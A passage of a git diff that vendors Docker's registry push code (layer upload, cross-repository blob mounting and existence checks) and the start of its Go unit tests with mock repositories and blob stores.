clean this up when distribution has a + // richer reference package + remoteRef, err := distreference.WithName(namedRef.RemoteName()) + if err != nil { + logrus.Errorf("failed to make remote reference out of %q: %v", namedRef.RemoteName(), namedRef.RemoteName()) + continue + } + + canonicalRef, err := distreference.WithDigest(distreference.TrimNamed(remoteRef), mountCandidate.Digest) + if err != nil { + logrus.Errorf("failed to make canonical reference: %v", err) + continue + } + + createOpts = append(createOpts, client.WithMountFrom(canonicalRef)) + } + + // send the layer + lu, err := bs.Create(ctx, createOpts...) + switch err := err.(type) { + case nil: + // noop + case distribution.ErrBlobMounted: + progress.Updatef(progressOutput, pd.ID(), "Mounted from %s", err.From.Name()) + + err.Descriptor.MediaType = schema2.MediaTypeLayer + + pd.pushState.Lock() + pd.pushState.confirmedV2 = true + pd.pushState.remoteLayers[diffID] = err.Descriptor + pd.pushState.Unlock() + + // Cache mapping from this layer's DiffID to the blobsum + if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ + Digest: err.Descriptor.Digest, + SourceRepository: pd.repoInfo.FullName(), + }); err != nil { + return distribution.Descriptor{}, xfer.DoNotRetry{Err: err} + } + return err.Descriptor, nil + default: + logrus.Infof("failed to mount layer %s (%s) from %s: %v", diffID, mountCandidate.Digest, mountCandidate.SourceRepository, err) + } + + if len(mountCandidate.SourceRepository) > 0 && + (metadata.CheckV2MetadataHMAC(&mountCandidate, pd.hmacKey) || + len(mountCandidate.HMAC) == 0) { + cause := "blob mount failure" + if err != nil { + cause = fmt.Sprintf("an error: %v", err.Error()) + } + logrus.Debugf("removing association between layer %s and %s due to %s", mountCandidate.Digest, mountCandidate.SourceRepository, cause) + pd.v2MetadataService.Remove(mountCandidate) + } + + if lu != nil { + // cancel previous upload + cancelLayerUpload(ctx, mountCandidate.Digest, layerUpload) + layerUpload = lu + } + } + + if maxExistenceChecks-len(pd.checkedDigests) > 0 { + // do additional layer existence checks with other known digests if any + descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, checkOtherRepositories, maxExistenceChecks-len(pd.checkedDigests), v2Metadata) + if exists || err != nil { + return descriptor, err + } + } + + logrus.Debugf("Pushing layer: %s", diffID) + if layerUpload == nil { + layerUpload, err = bs.Create(ctx) + if err != nil { + return distribution.Descriptor{}, retryOnError(err) + } + } + defer layerUpload.Close() + + // upload the blob + desc, err := pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload) + if err != nil { + return desc, err + } + + return desc, nil +} + +func (pd *v2PushDescriptor) SetRemoteDescriptor(descriptor distribution.Descriptor) { + pd.remoteDescriptor = descriptor +} + +func (pd *v2PushDescriptor) Descriptor() distribution.Descriptor { + return pd.remoteDescriptor +} + +func (pd *v2PushDescriptor) uploadUsingSession( + ctx context.Context, + progressOutput progress.Output, + diffID layer.DiffID, + layerUpload distribution.BlobWriter, +) (distribution.Descriptor, error) { + var reader io.ReadCloser + + contentReader, err := pd.layer.Open() + size, _ := pd.layer.Size() + + reader = progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, contentReader), progressOutput, size, pd.ID(), "Pushing") + + switch m := pd.layer.MediaType(); m { + case schema2.MediaTypeUncompressedLayer: + compressedReader, compressionDone := compress(reader) + defer func(closer io.Closer) { + closer.Close() + <-compressionDone + }(reader) + reader = compressedReader + case schema2.MediaTypeLayer: + default: + reader.Close() + return distribution.Descriptor{}, fmt.Errorf("unsupported layer media type %s", m) + } + + digester := digest.Canonical.New() + tee := io.TeeReader(reader, digester.Hash()) + + nn, err := layerUpload.ReadFrom(tee) + reader.Close() + if err != nil { + return distribution.Descriptor{}, retryOnError(err) + } + + pushDigest := digester.Digest() + if _, err := layerUpload.Commit(ctx, distribution.Descriptor{Digest: pushDigest}); err != nil { + return distribution.Descriptor{}, retryOnError(err) + } + + logrus.Debugf("uploaded layer %s (%s), %d bytes", diffID, pushDigest, nn) + progress.Update(progressOutput, pd.ID(), "Pushed") + + // Cache mapping from this layer's DiffID to the blobsum + if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ + Digest: pushDigest, + SourceRepository: pd.repoInfo.FullName(), + }); err != nil { + return distribution.Descriptor{}, xfer.DoNotRetry{Err: err} + } + + desc := distribution.Descriptor{ + Digest: pushDigest, + MediaType: schema2.MediaTypeLayer, + Size: nn, + } + + pd.pushState.Lock() + // If Commit succeeded, that's an indication that the remote registry speaks the v2 protocol. + pd.pushState.confirmedV2 = true + pd.pushState.remoteLayers[diffID] = desc + pd.pushState.Unlock() + + return desc, nil +} + +// layerAlreadyExists checks if the registry already knows about any of the metadata passed in the "metadata" +// slice. If it finds one that the registry knows about, it returns the known digest and "true". If +// "checkOtherRepositories" is true, stat will be performed also with digests mapped to any other repository +// (not just the target one). +func (pd *v2PushDescriptor) layerAlreadyExists( + ctx context.Context, + progressOutput progress.Output, + diffID layer.DiffID, + checkOtherRepositories bool, + maxExistenceCheckAttempts int, + v2Metadata []metadata.V2Metadata, +) (desc distribution.Descriptor, exists bool, err error) { + // filter the metadata + candidates := []metadata.V2Metadata{} + for _, meta := range v2Metadata { + if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.FullName() { + continue + } + candidates = append(candidates, meta) + } + // sort the candidates by similarity + sortV2MetadataByLikenessAndAge(pd.repoInfo, pd.hmacKey, candidates) + + digestToMetadata := make(map[digest.Digest]*metadata.V2Metadata) + // an array of unique blob digests ordered from the best mount candidates to worst + layerDigests := []digest.Digest{} + for i := 0; i < len(candidates); i++ { + if len(layerDigests) >= maxExistenceCheckAttempts { + break + } + meta := &candidates[i] + if _, exists := digestToMetadata[meta.Digest]; exists { + // keep reference just to the first mapping (the best mount candidate) + continue + } + if _, exists := pd.checkedDigests[meta.Digest]; exists { + // existence of this digest has already been tested + continue + } + digestToMetadata[meta.Digest] = meta + layerDigests = append(layerDigests, meta.Digest) + } + +attempts: + for _, dgst := range layerDigests { + meta := digestToMetadata[dgst] + logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName()) + desc, err = pd.repo.Blobs(ctx).Stat(ctx, dgst) + pd.checkedDigests[meta.Digest] = struct{}{} + switch err { + case nil: + if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.FullName() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) { + // cache mapping from this layer's DiffID to the blobsum + if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ + Digest: desc.Digest, + SourceRepository: pd.repoInfo.FullName(), + }); err != nil { + return distribution.Descriptor{}, false, xfer.DoNotRetry{Err: err} + } + } + desc.MediaType = schema2.MediaTypeLayer + exists = true + break attempts + case distribution.ErrBlobUnknown: + if meta.SourceRepository == pd.repoInfo.FullName() { + // remove the mapping to the target repository + pd.v2MetadataService.Remove(*meta) + } + default: + logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName()) + } + } + + if exists { + progress.Update(progressOutput, pd.ID(), "Layer already exists") + pd.pushState.Lock() + pd.pushState.remoteLayers[diffID] = desc + pd.pushState.Unlock() + } + + return desc, exists, nil +} + +// getMaxMountAndExistenceCheckAttempts returns a maximum number of cross repository mount attempts from +// source repositories of target registry, maximum number of layer existence checks performed on the target +// repository and whether the check shall be done also with digests mapped to different repositories. The +// decision is based on layer size. The smaller the layer, the fewer attempts shall be made because the cost +// of upload does not outweigh a latency. +func getMaxMountAndExistenceCheckAttempts(layer PushLayer) (maxMountAttempts, maxExistenceCheckAttempts int, checkOtherRepositories bool) { + size, err := layer.Size() + switch { + // big blob + case size > middleLayerMaximumSize: + // 1st attempt to mount the blob few times + // 2nd few existence checks with digests associated to any repository + // then fallback to upload + return 4, 3, true + + // middle sized blobs; if we could not get the size, assume we deal with middle sized blob + case size > smallLayerMaximumSize, err != nil: + // 1st attempt to mount blobs of average size few times + // 2nd try at most 1 existence check if there's an existing mapping to the target repository + // then fallback to upload + return 3, 1, false + + // small blobs, do a minimum number of checks + default: + return 1, 1, false + } +} + +// getRepositoryMountCandidates returns an array of v2 metadata items belonging to the given registry. The +// array is sorted from youngest to oldest. If requireReigstryMatch is true, the resulting array will contain +// only metadata entries having registry part of SourceRepository matching the part of repoInfo. +func getRepositoryMountCandidates( + repoInfo reference.Named, + hmacKey []byte, + max int, + v2Metadata []metadata.V2Metadata, +) []metadata.V2Metadata { + candidates := []metadata.V2Metadata{} + for _, meta := range v2Metadata { + sourceRepo, err := reference.ParseNamed(meta.SourceRepository) + if err != nil || repoInfo.Hostname() != sourceRepo.Hostname() { + continue + } + // target repository is not a viable candidate + if meta.SourceRepository == repoInfo.FullName() { + continue + } + candidates = append(candidates, meta) + } + + sortV2MetadataByLikenessAndAge(repoInfo, hmacKey, candidates) + if max >= 0 && len(candidates) > max { + // select the youngest metadata + candidates = candidates[:max] + } + + return candidates +} + +// byLikeness is a sorting container for v2 metadata candidates for cross repository mount. The +// candidate "a" is preferred over "b": +// +// 1. if it was hashed using the same AuthConfig as the one used to authenticate to target repository and the +// "b" was not +// 2. if a number of its repository path components exactly matching path components of target repository is higher +type byLikeness struct { + arr []metadata.V2Metadata + hmacKey []byte + pathComponents []string +} + +func (bla byLikeness) Less(i, j int) bool { + aMacMatch := metadata.CheckV2MetadataHMAC(&bla.arr[i], bla.hmacKey) + bMacMatch := metadata.CheckV2MetadataHMAC(&bla.arr[j], bla.hmacKey) + if aMacMatch != bMacMatch { + return aMacMatch + } + aMatch := numOfMatchingPathComponents(bla.arr[i].SourceRepository, bla.pathComponents) + bMatch := numOfMatchingPathComponents(bla.arr[j].SourceRepository, bla.pathComponents) + return aMatch > bMatch +} +func (bla byLikeness) Swap(i, j int) { + bla.arr[i], bla.arr[j] = bla.arr[j], bla.arr[i] +} +func (bla byLikeness) Len() int { return len(bla.arr) } + +func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, hmacKey []byte, marr []metadata.V2Metadata) { + // reverse the metadata array to shift the newest entries to the beginning + for i := 0; i < len(marr)/2; i++ { + marr[i], marr[len(marr)-i-1] = marr[len(marr)-i-1], marr[i] + } + // keep equal entries ordered from the youngest to the oldest + sort.Stable(byLikeness{ + arr: marr, + hmacKey: hmacKey, + pathComponents: getPathComponents(repoInfo.FullName()), + }) +} + +// numOfMatchingPathComponents returns a number of path components in "pth" that exactly match "matchComponents". +func numOfMatchingPathComponents(pth string, matchComponents []string) int { + pthComponents := getPathComponents(pth) + i := 0 + for ; i < len(pthComponents) && i < len(matchComponents); i++ { + if matchComponents[i] != pthComponents[i] { + return i + } + } + return i +} + +func getPathComponents(path string) []string { + // make sure to add docker.io/ prefix to the path + named, err := reference.ParseNamed(path) + if err == nil { + path = named.FullName() + } + return strings.Split(path, "/") +} + +func cancelLayerUpload(ctx context.Context, dgst digest.Digest, layerUpload distribution.BlobWriter) { + if layerUpload != nil { + logrus.Debugf("cancelling upload of blob %s", dgst) + err := layerUpload.Cancel(ctx) + if err != nil { + logrus.Warnf("failed to cancel upload: %v", err) + } + } +} diff --git a/vendor/github.com/docker/docker/distribution/push_v2_test.go b/vendor/github.com/docker/docker/distribution/push_v2_test.go new file mode 100644 index 0000000000..6a5216b1d0 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/push_v2_test.go @@ -0,0 +1,579 @@ +package distribution + +import ( + "net/http" + "reflect" + "testing" + + "github.com/docker/distribution" + "github.com/docker/distribution/context" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema2" + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" +) + +func TestGetRepositoryMountCandidates(t *testing.T) { + for _, tc := range []struct { + name string + hmacKey string + targetRepo string + maxCandidates int + metadata []metadata.V2Metadata + candidates []metadata.V2Metadata + }{ + { + name: "empty metadata", + targetRepo: "busybox", + maxCandidates: -1, + metadata: []metadata.V2Metadata{}, + candidates: []metadata.V2Metadata{}, + }, + { + name: "one item not matching", + targetRepo: "busybox", + maxCandidates: -1, + metadata: []metadata.V2Metadata{taggedMetadata("key", "dgst", "127.0.0.1/repo")}, + candidates: []metadata.V2Metadata{}, + }, + { + name: "one item matching", + targetRepo: "busybox", + maxCandidates: -1, + metadata: []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")}, + candidates: []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")}, + }, + { + name: "allow missing SourceRepository", + targetRepo: "busybox", + maxCandidates: -1, + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("1")}, + {Digest: digest.Digest("3")}, + {Digest: digest.Digest("2")}, + }, + candidates: []metadata.V2Metadata{}, + }, + { + name: "handle docker.io", + targetRepo: "user/app", + maxCandidates: -1, + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"}, + {Digest: digest.Digest("3"), SourceRepository: "user/bar"}, + {Digest: digest.Digest("2"), SourceRepository: "app"}, + }, + candidates: []metadata.V2Metadata{ + {Digest: digest.Digest("3"), SourceRepository: "user/bar"}, + {Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"}, + {Digest: digest.Digest("2"), SourceRepository: "app"}, + }, + }, + { + name: "sort more items", + hmacKey: "abcd", + targetRepo: "127.0.0.1/foo/bar", + maxCandidates: -1, + metadata: []metadata.V2Metadata{ + taggedMetadata("hash", "1", "hello-world"), + taggedMetadata("efgh", "2", "127.0.0.1/hello-world"), + taggedMetadata("abcd", "3", "busybox"), + taggedMetadata("hash", "4", "busybox"), + taggedMetadata("hash", "5", "127.0.0.1/foo"), + taggedMetadata("hash", "6", "127.0.0.1/bar"), + taggedMetadata("efgh", "7", "127.0.0.1/foo/bar"), + taggedMetadata("abcd", "8", "127.0.0.1/xyz"), + taggedMetadata("hash", "9", "127.0.0.1/foo/app"), + }, + candidates: []metadata.V2Metadata{ + // first by matching hash + taggedMetadata("abcd", "8", "127.0.0.1/xyz"), + // then by longest matching prefix + taggedMetadata("hash", "9", "127.0.0.1/foo/app"), + taggedMetadata("hash", "5", "127.0.0.1/foo"), + // sort the rest of the matching items in reversed order + taggedMetadata("hash", "6", "127.0.0.1/bar"), + taggedMetadata("efgh", "2", "127.0.0.1/hello-world"), + }, + }, + { + name: "limit max candidates", + hmacKey: "abcd", + targetRepo: "user/app", + maxCandidates: 3, + metadata: []metadata.V2Metadata{ + taggedMetadata("abcd", "1", "user/app1"), + taggedMetadata("abcd", "2", "user/app/base"), + taggedMetadata("hash", "3", "user/app"), + taggedMetadata("abcd", "4", "127.0.0.1/user/app"), + taggedMetadata("hash", "5", "user/foo"), + taggedMetadata("hash", "6", "app/bar"), + }, + candidates: []metadata.V2Metadata{ + // first by matching hash + taggedMetadata("abcd", "2", "user/app/base"), + taggedMetadata("abcd", "1", "user/app1"), + // then by longest matching prefix + taggedMetadata("hash", "3", "user/app"), + }, + }, + } { + repoInfo, err := reference.ParseNamed(tc.targetRepo) + if err != nil { + t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err) + } + candidates := getRepositoryMountCandidates(repoInfo, []byte(tc.hmacKey), tc.maxCandidates, tc.metadata) + if len(candidates) != len(tc.candidates) { + t.Errorf("[%s] got unexpected number of candidates: %d != %d", tc.name, len(candidates), len(tc.candidates)) + } + for i := 0; i < len(candidates) && i < len(tc.candidates); i++ { + if !reflect.DeepEqual(candidates[i], tc.candidates[i]) { + t.Errorf("[%s] candidate %d does not match expected: %#+v != %#+v", tc.name, i, candidates[i], tc.candidates[i]) + } + } + for i := len(candidates); i < len(tc.candidates); i++ { + t.Errorf("[%s] missing expected candidate at position %d (%#+v)", tc.name, i, tc.candidates[i]) + } + for i := len(tc.candidates); i < len(candidates); i++ { + t.Errorf("[%s] got unexpected candidate at position %d (%#+v)", tc.name, i, candidates[i]) + } + } +} + +func TestLayerAlreadyExists(t *testing.T) { + for _, tc := range []struct { + name string + metadata []metadata.V2Metadata + targetRepo string + hmacKey string + maxExistenceChecks int + checkOtherRepositories bool + remoteBlobs map[digest.Digest]distribution.Descriptor + remoteErrors map[digest.Digest]error + expectedDescriptor distribution.Descriptor + expectedExists bool + expectedError error + expectedRequests []string + expectedAdditions []metadata.V2Metadata + expectedRemovals []metadata.V2Metadata + }{ + { + name: "empty metadata", + targetRepo: "busybox", + maxExistenceChecks: 3, + checkOtherRepositories: true, + }, + { + name: "single not existent metadata", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}}, + maxExistenceChecks: 3, + expectedRequests: []string{"pear"}, + expectedRemovals: []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}}, + }, + { + name: "access denied", + targetRepo: "busybox", + maxExistenceChecks: 1, + metadata: []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}}, + remoteErrors: map[digest.Digest]error{digest.Digest("apple"): distribution.ErrAccessDenied}, + expectedError: nil, + expectedRequests: []string{"apple"}, + }, + { + name: "not matching reposies", + targetRepo: "busybox", + maxExistenceChecks: 3, + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/hello-world"}, + {Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"}, + {Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"}, + {Digest: digest.Digest("plum"), SourceRepository: "busybox"}, + {Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"}, + }, + }, + { + name: "check other repositories", + targetRepo: "busybox", + maxExistenceChecks: 10, + checkOtherRepositories: true, + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/hello-world"}, + {Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"}, + {Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"}, + {Digest: digest.Digest("plum"), SourceRepository: "busybox"}, + {Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"}, + }, + expectedRequests: []string{"plum", "pear", "apple", "orange", "banana"}, + }, + { + name: "find existing blob", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}}, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple")}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple"}, + }, + { + name: "find existing blob with different hmac", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{{SourceRepository: "docker.io/library/busybox", Digest: digest.Digest("apple"), HMAC: "dummyhmac"}}, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple")}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple"}, + expectedAdditions: []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}}, + }, + { + name: "overwrite media types", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}}, + hmacKey: "key", + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple"), MediaType: "custom-media-type"}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple"}, + expectedAdditions: []metadata.V2Metadata{taggedMetadata("key", "apple", "docker.io/library/busybox")}, + }, + { + name: "find existing blob among many", + targetRepo: "127.0.0.1/myapp", + hmacKey: "key", + metadata: []metadata.V2Metadata{ + taggedMetadata("someotherkey", "pear", "127.0.0.1/myapp"), + taggedMetadata("key", "apple", "127.0.0.1/myapp"), + taggedMetadata("", "plum", "127.0.0.1/myapp"), + }, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("pear"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple", "plum", "pear"}, + expectedAdditions: []metadata.V2Metadata{taggedMetadata("key", "pear", "127.0.0.1/myapp")}, + expectedRemovals: []metadata.V2Metadata{ + taggedMetadata("key", "apple", "127.0.0.1/myapp"), + {Digest: digest.Digest("plum"), SourceRepository: "127.0.0.1/myapp"}, + }, + }, + { + name: "reach maximum existence checks", + targetRepo: "user/app", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("pear"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"}, + }, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}}, + expectedExists: false, + expectedRequests: []string{"banana", "plum", "apple"}, + expectedRemovals: []metadata.V2Metadata{ + {Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"}, + }, + }, + { + name: "zero allowed existence checks", + targetRepo: "user/app", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("pear"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"}, + }, + maxExistenceChecks: 0, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}}, + }, + { + name: "stat single digest just once", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{ + taggedMetadata("key1", "pear", "docker.io/library/busybox"), + taggedMetadata("key2", "apple", "docker.io/library/busybox"), + taggedMetadata("key3", "apple", "docker.io/library/busybox"), + }, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("pear"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple", "pear"}, + expectedAdditions: []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}}, + expectedRemovals: []metadata.V2Metadata{taggedMetadata("key3", "apple", "docker.io/library/busybox")}, + }, + { + name: "don't stop on first error", + targetRepo: "user/app", + hmacKey: "key", + metadata: []metadata.V2Metadata{ + taggedMetadata("key", "banana", "docker.io/user/app"), + taggedMetadata("key", "orange", "docker.io/user/app"), + taggedMetadata("key", "plum", "docker.io/user/app"), + }, + maxExistenceChecks: 3, + remoteErrors: map[digest.Digest]error{"orange": distribution.ErrAccessDenied}, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {}}, + expectedError: nil, + expectedRequests: []string{"plum", "orange", "banana"}, + expectedRemovals: []metadata.V2Metadata{ + taggedMetadata("key", "plum", "docker.io/user/app"), + taggedMetadata("key", "banana", "docker.io/user/app"), + }, + }, + { + name: "remove outdated metadata", + targetRepo: "docker.io/user/app", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"}, + {Digest: digest.Digest("orange"), SourceRepository: "docker.io/user/app"}, + }, + maxExistenceChecks: 3, + remoteErrors: map[digest.Digest]error{"orange": distribution.ErrBlobUnknown}, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("plum"): {}}, + expectedExists: false, + expectedRequests: []string{"orange"}, + expectedRemovals: []metadata.V2Metadata{{Digest: digest.Digest("orange"), SourceRepository: "docker.io/user/app"}}, + }, + { + name: "missing SourceRepository", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("1")}, + {Digest: digest.Digest("3")}, + {Digest: digest.Digest("2")}, + }, + maxExistenceChecks: 3, + expectedExists: false, + expectedRequests: []string{"2", "3", "1"}, + }, + + { + name: "with and without SourceRepository", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("1")}, + {Digest: digest.Digest("2"), SourceRepository: "docker.io/library/busybox"}, + {Digest: digest.Digest("3")}, + }, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("1"): {Digest: digest.Digest("1")}}, + maxExistenceChecks: 3, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("1"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"2", "3", "1"}, + expectedAdditions: []metadata.V2Metadata{{Digest: digest.Digest("1"), SourceRepository: "docker.io/library/busybox"}}, + expectedRemovals: []metadata.V2Metadata{ + {Digest: digest.Digest("2"), SourceRepository: "docker.io/library/busybox"}, + }, + }, + } { + repoInfo, err := reference.ParseNamed(tc.targetRepo) + if err != nil { + t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err) + } + repo := &mockRepo{ + t: t, + errors: tc.remoteErrors, + blobs: tc.remoteBlobs, + requests: []string{}, + } + ctx := context.Background() + ms := &mockV2MetadataService{} + pd := &v2PushDescriptor{ + hmacKey: []byte(tc.hmacKey), + repoInfo: repoInfo, + layer: &storeLayer{ + Layer: layer.EmptyLayer, + }, + repo: repo, + v2MetadataService: ms, + pushState: &pushState{remoteLayers: make(map[layer.DiffID]distribution.Descriptor)}, + checkedDigests: make(map[digest.Digest]struct{}), + } + + desc, exists, err := pd.layerAlreadyExists(ctx, &progressSink{t}, layer.EmptyLayer.DiffID(), tc.checkOtherRepositories, tc.maxExistenceChecks, tc.metadata) + + if !reflect.DeepEqual(desc, tc.expectedDescriptor) { + t.Errorf("[%s] got unexpected descriptor: %#+v != %#+v", tc.name, desc, tc.expectedDescriptor) + } + if exists != tc.expectedExists { + t.Errorf("[%s] got unexpected exists: %t != %t", tc.name, exists, tc.expectedExists) + } + if !reflect.DeepEqual(err, tc.expectedError) { + t.Errorf("[%s] got unexpected error: %#+v != %#+v", tc.name, err, tc.expectedError) + } + + if len(repo.requests) != len(tc.expectedRequests) { + t.Errorf("[%s] got unexpected number of requests: %d != %d", tc.name, len(repo.requests), len(tc.expectedRequests)) + } + for i := 0; i < len(repo.requests) && i < len(tc.expectedRequests); i++ { + if repo.requests[i] != tc.expectedRequests[i] { + t.Errorf("[%s] request %d does not match expected: %q != %q", tc.name, i, repo.requests[i], tc.expectedRequests[i]) + } + } + for i := len(repo.requests); i < len(tc.expectedRequests); i++ { + t.Errorf("[%s] missing expected request at position %d (%q)", tc.name, i, tc.expectedRequests[i]) + } + for i := len(tc.expectedRequests); i < len(repo.requests); i++ { + t.Errorf("[%s] got unexpected request at position %d (%q)", tc.name, i, repo.requests[i]) + } + + if len(ms.added) != len(tc.expectedAdditions) { + t.Errorf("[%s] got unexpected number of additions: %d != %d", tc.name, len(ms.added), len(tc.expectedAdditions)) + } + for i := 0; i < len(ms.added) && i < len(tc.expectedAdditions); i++ { + if ms.added[i] != tc.expectedAdditions[i] { + t.Errorf("[%s] added metadata at %d does not match expected: %q != %q", tc.name, i, ms.added[i], tc.expectedAdditions[i]) + } + } + for i := len(ms.added); i < len(tc.expectedAdditions); i++ { + t.Errorf("[%s] missing expected addition at position %d (%q)", tc.name, i, tc.expectedAdditions[i]) + } + for i := len(tc.expectedAdditions); i < len(ms.added); i++ { + t.Errorf("[%s] unexpected metadata addition at position %d (%q)", tc.name, i, ms.added[i]) + } + + if len(ms.removed) != len(tc.expectedRemovals) { + t.Errorf("[%s] got unexpected number of removals: %d != %d", tc.name, len(ms.removed), len(tc.expectedRemovals)) + } + for i := 0; i < len(ms.removed) && i < len(tc.expectedRemovals); i++ { + if ms.removed[i] != tc.expectedRemovals[i] { + t.Errorf("[%s] removed metadata at %d does not match expected: %q != %q", tc.name, i, ms.removed[i], tc.expectedRemovals[i]) + } + } + for i := len(ms.removed); i < len(tc.expectedRemovals); i++ { + t.Errorf("[%s] missing expected removal at position %d (%q)", tc.name, i, tc.expectedRemovals[i]) + } + for i := len(tc.expectedRemovals); i < len(ms.removed); i++ { + t.Errorf("[%s] removed unexpected metadata at position %d (%q)", tc.name, i, ms.removed[i]) + } + } +} + +func taggedMetadata(key string, dgst string, sourceRepo string) metadata.V2Metadata { + meta := metadata.V2Metadata{ + Digest: digest.Digest(dgst), + SourceRepository: sourceRepo, + } + + meta.HMAC = metadata.ComputeV2MetadataHMAC([]byte(key), &meta) + return meta +} + +type mockRepo struct { + t *testing.T + errors map[digest.Digest]error + blobs map[digest.Digest]distribution.Descriptor + requests []string +} + +var _ distribution.Repository = &mockRepo{} + +func (m *mockRepo) Named() distreference.Named { + m.t.Fatalf("Named() not implemented") + return nil +} +func (m *mockRepo) Manifests(ctc context.Context, options ...distribution.ManifestServiceOption) (distribution.ManifestService, error) { + m.t.Fatalf("Manifests() not implemented") + return nil, nil +} +func (m *mockRepo) Tags(ctc context.Context) distribution.TagService { + m.t.Fatalf("Tags() not implemented") + return nil +} +func (m *mockRepo) Blobs(ctx context.Context) distribution.BlobStore { + return &mockBlobStore{ + repo: m, + } +} + +type mockBlobStore struct { + repo *mockRepo +} + +var _ 